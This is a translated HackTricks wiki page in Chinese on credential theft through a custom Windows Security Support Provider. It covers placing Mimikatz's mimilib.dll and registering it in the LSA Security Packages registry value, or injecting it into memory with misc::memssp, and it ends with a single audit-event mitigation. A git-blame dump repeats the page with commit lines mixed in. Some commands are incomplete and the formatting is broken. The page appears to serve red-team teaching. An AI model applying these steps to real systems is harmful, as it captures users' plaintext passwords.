hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

# Custom SSP

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

其他支持HackTricks的方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>

### 自定义SSP

[了解什么是SSP（安全支持提供者）请点击这里。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
您可以创建**自己的SSP**来**捕获**以**明文**形式访问计算机所使用的**凭据**。

#### Mimilib

您可以使用Mimikatz提供的`mimilib.dll`二进制文件。**这将在文件中记录所有明文凭据。**\
将dll放入`C:\Windows\System32\`\
获取现有LSA安全包的列表：

{% code title="attacker@target" %}
```
```
{% endcode %}

\`\`\`bash PS C:\\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY\_LOCAL\_MACHINE\system\currentcontrolset\control\lsa Security Packages REG\_MULTI\_SZ kerberos\0msv1\_0\0schannel\0wdigest\0tspkg\0pku2u

````
将`mimilib.dll`添加到安全支持提供程序列表（安全包）中：
```powershell
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
````

#### 在内存中

您还可以直接使用 Mimikatz 将其注入到内存中（请注意，这可能会有点不稳定/无法正常工作）：

```powershell
privilege::debug
misc::memssp
```

这种方法在重启后无法生存。

#### 缓解

事件ID 4657 - 审计`HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`的创建/更改

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								# Custom SSP
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								其他支持HackTricks的方式：
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								### 自定义SSP
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								[了解什么是SSP（安全支持提供者）请点击这里。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								您可以创建**自己的SSP**来**捕获**以**明文**形式访问计算机所使用的**凭据**。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								#### Mimilib
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								您可以使用Mimikatz提供的`mimilib.dll`二进制文件。**这将在文件中记录所有明文凭据。**\
-												Translated ['network-services-pentesting/1026-pentesting-rusersd.md', 'n

											
										
										
											2024-01-12 08:16:22 +00:00
+								将dll放入`C:\Windows\System32\`\
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								获取现有LSA安全包的列表：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								{% code title="attacker@target" %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								```
 								{% endcode %}
 								\`\`\`bash PS C:\\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
 								HKEY\_LOCAL\_MACHINE\system\currentcontrolset\control\lsa Security Packages REG\_MULTI\_SZ kerberos\0msv1\_0\0schannel\0wdigest\0tspkg\0pku2u
 								````
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								将`mimilib.dll`添加到安全支持提供程序列表（安全包）中：
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								```powershell
 								reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								````
 								#### 在内存中
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								您还可以直接使用 Mimikatz 将其注入到内存中（请注意，这可能会有点不稳定/无法正常工作）：
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								```powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								privilege::debug
 								misc::memssp
 								```
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								这种方法在重启后无法生存。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								#### 缓解
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								事件ID 4657 - 审计`HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`的创建/更改
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
-												Translated ['network-services-pentesting/1026-pentesting-rusersd.md', 'n

											
										
										
											2024-01-12 08:16:22 +00:00
+								支持HackTricks的其他方式：
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>